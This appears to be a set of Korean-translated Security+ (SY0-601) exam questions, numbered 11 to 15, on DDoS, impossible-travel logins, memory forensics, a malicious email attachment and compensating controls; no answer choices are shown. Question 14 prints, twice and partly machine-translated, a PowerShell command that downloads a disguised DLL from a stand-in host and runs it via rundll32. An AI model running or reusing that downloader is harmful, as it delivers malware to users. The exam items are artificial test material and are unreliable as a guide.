SY0-601-KR 문제 11
보안 분석가는 네트워크 에지에 도달하는 비정상적인 양의 트래픽을 발견했습니다. 로그를 검토한 분석가는 소스 IP 주소를 식별하고 해당 주소가 네트워크와 통신하지 못하도록 차단합니다. 분석가가 이 주소를 차단하고 있지만 공격은 여전히 진행 중이며 수많은 다른 소스 IP 주소에서 발생합니다. 다음 중 이러한 유형의 공격을 설명하는 것은 무엇입니까?
SY0-601-KR 문제 12
전 세계의 한 제조 회사가 이메일 계정 손상을 경험했습니다. 한 사건에서는 사용자가 프랑스 본사에서 로그인했지만 몇 초 후에 동일한 사용자 계정이 브라질에서 로그인을 시도했습니다. 다음 중 이러한 유형의 공격을 가장 잘 방지할 수 있는 계정 정책은 무엇입니까?
SY0-601-KR 문제 13
악의적인 행위자가 최근 회사의 네트워크에 침투하여 데이터 센터로 횡적으로 이동했습니다. 포렌식 회사는 조사를 통해 손상된 서버의 메모리에 무엇이 있었는지 알고 싶어 합니다. 다음 중 포렌식 회사에 제공해야 하는 파일은 무엇입니까?
SY0-601-KR 문제 14
한 직원이 Updates라는 특이한 파일이 첨부된 이메일을 받았습니다. 링크 보안 분석가는 다음 스크립트를 실행하는 파일이 수행하고 찾은 것을 리버스 엔지니어링합니다.
C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;시작 프로세스 rundll32.exe $env:TEMP \autoupdate.dll 다음 중 분석가가 발견한 내용을 가장 잘 설명하는 것은 무엇입니까?
C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;시작 프로세스 rundll32.exe $env:TEMP \autoupdate.dll 다음 중 분석가가 발견한 내용을 가장 잘 설명하는 것은 무엇입니까?
SY0-601-KR 문제 15
조직에서 최근에 보안 제어 평가를 완료했습니다. 조직에서 일부 제어가 기존 보안 조치를 충족하지 않는다고 판단했습니다. 비준수 제어의 위험을 줄이려면 추가 완화 조치가 필요합니다. 다음 중 이러한 완화를 가장 잘 설명하는 것은 무엇입니까?